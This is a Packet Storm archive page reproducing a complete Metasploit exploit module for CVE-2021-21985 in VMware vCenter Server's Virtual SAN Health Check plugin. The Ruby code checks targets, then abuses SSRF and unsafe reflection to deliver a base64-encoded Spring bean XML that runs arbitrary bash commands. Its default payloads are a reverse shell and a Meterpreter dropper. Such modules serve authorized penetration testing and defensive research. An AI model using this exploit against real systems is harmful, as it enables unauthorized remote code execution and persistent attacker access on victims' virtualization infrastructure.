what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

VMware vCenter Server Virtual SAN Health Check Remote Code Execution

VMware vCenter Server Virtual SAN Health Check Remote Code Execution
Posted Jul 13, 2021
Authored by wvu, Ricter Z | Site metasploit.com

This Metasploit module exploits Java unsafe reflection and SSRF in the VMware vCenter Server Virtual SAN Health Check plugin's ProxygenController class to execute code as the vsphere-ui user. See the vendor advisory for affected and patched versions. Tested against VMware vCenter Server 6.7 Update 3m (Linux appliance

tags | exploit, java
systems | linux
advisories | CVE-2021-21985
SHA-256 | bdb3128591e803fa1beff81827096bb294a0b4124989ab73f3593b99e35faca8

VMware vCenter Server Virtual SAN Health Check Remote Code Execution

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

Rank = ExcellentRanking

prepend Msf::Exploit::Remote::AutoCheck
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager

def initialize(info = {})
super(
update_info(
info,
'Name' => 'VMware vCenter Server Virtual SAN Health Check Plugin RCE',
'Description' => %q{
This module exploits Java unsafe reflection and SSRF in the VMware
vCenter Server Virtual SAN Health Check plugin's ProxygenController
class to execute code as the vsphere-ui user.

See the vendor advisory for affected and patched versions. Tested
against VMware vCenter Server 6.7 Update 3m (Linux appliance).
},
'Author' => [
'Ricter Z', # Discovery and PoC used
'wvu' # Analysis and exploit
],
'References' => [
['CVE', '2021-21985'],
['URL', 'https://www.vmware.com/security/advisories/VMSA-2021-0010.html'],
['URL', 'https://attackerkb.com/topics/X85GKjaVER/cve-2021-21985#rapid7-analysis'],
['URL', 'http://noahblog.360.cn/vcenter-cve-2021-2021-21985/'],
# Other great writeups!
['URL', 'https://www.iswin.org/2021/06/02/Vcenter-Server-CVE-2021-21985-RCE-PAYLOAD/'],
['URL', 'https://testbnull.medium.com/a-quick-look-at-cve-2021-21985-vcenter-pre-auth-rce-9ecd459150a5'],
['URL', 'https://y4y.space/2021/06/04/learning-jndi-injection-from-cve-2021-21985/'],
['URL', 'https://github.com/alt3kx/CVE-2021-21985_PoC']
],
'DisclosureDate' => '2021-05-25',
'License' => MSF_LICENSE,
'Platform' => ['unix', 'linux'], # TODO: Windows?
'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
'Privileged' => false,
'Targets' => [
[
'Unix Command',
{
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Type' => :unix_cmd,
'DefaultOptions' => {
'PAYLOAD' => 'cmd/unix/reverse_python_ssl'
}
}
],
[
'Linux Dropper',
{
'Platform' => 'linux',
'Arch' => [ARCH_X86, ARCH_X64],
'Type' => :linux_dropper,
'DefaultOptions' => {
'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
}
}
]
],
'DefaultTarget' => 0,
'DefaultOptions' => {
'RPORT' => 443,
'SSL' => true
},
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [FIRST_ATTEMPT_FAIL], # SSRF can be a little finicky
'SideEffects' => [
IOC_IN_LOGS, # /var/log/vmware/vsphere-ui/logs/vsphere_client_virgo.log
ARTIFACTS_ON_DISK # CmdStager
]
}
)
)

register_options([
OptString.new('TARGETURI', [true, 'Base path', '/'])
])
end

def check
# https://docs.oracle.com/javase/tutorial/essential/environment/sysprop.html
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(
target_uri.path,
'/ui/h5-vsan/rest/proxy/service/systemProperties/getProperty'
),
'ctype' => 'application/json',
'data' => {
'methodInput' => ['user.name', nil]
}.to_json
)

return CheckCode::Unknown unless res

unless res.code == 200 && res.get_json_document['result'] == 'vsphere-ui'
return CheckCode::Safe
end

CheckCode::Vulnerable('System property user.name is vsphere-ui.')
end

def exploit
print_status("Executing #{payload_instance.refname} (#{target.name})")

case target['Type']
when :unix_cmd
execute_command(payload.encoded)
when :linux_dropper
execute_cmdstager
end
end

def execute_command(cmd, _opts = {})
vprint_status(cmd)

url = OfflineBundle.new(cmd).to_url

res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(
target_uri.path,
'/ui/h5-vsan/rest/proxy/service/vmodlContext/loadVmodlPackages'
),
'ctype' => 'application/json',
'data' => {
'methodInput' => [
["https://localhost/vsanHealth/vum/driverOfflineBundle/#{url}"],
false # lazyInit
]
}.to_json
)

fail_with(Failure::PayloadFailed, cmd) unless res&.code == 200
end

class OfflineBundle
attr_accessor :cmd

def initialize(cmd)
@cmd = cmd
end

def to_xml
bean = Rex::Text.rand_text_alpha_lower(8..16)
prop = Rex::Text.rand_text_alpha_lower(8..16)

# https://www.tutorialspoint.com/spring/spring_bean_definition.htm
<<~XML
<beans>
<bean id="#{bean}" class="java.lang.ProcessBuilder">
<constructor-arg>
<list>
<value>/bin/bash</value>
<value>-c</value>
<value><![CDATA[#{cmd}]]></value>
</list>
</constructor-arg>
<property name="#{prop}" value="\#{#{bean}.start()}"/>
</bean>
</beans>
XML
end

def to_zip
Msf::Util::EXE.to_zip([
fname: 'offline_bundle.xml',
data: to_xml.gsub(/^\s+/, '').tr("\n", '')
])
end

def to_url
# https://developer.mozilla.org/en-US/docs/Web/HTTP/Basics_of_HTTP/Data_URIs
"data:application/zip;base64,#{Rex::Text.encode_base64(to_zip)}"
end
end

end
Login or Register to add favorites

File Archive:

December 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    2 Files
  • 2
    Dec 2nd
    12 Files
  • 3
    Dec 3rd
    0 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close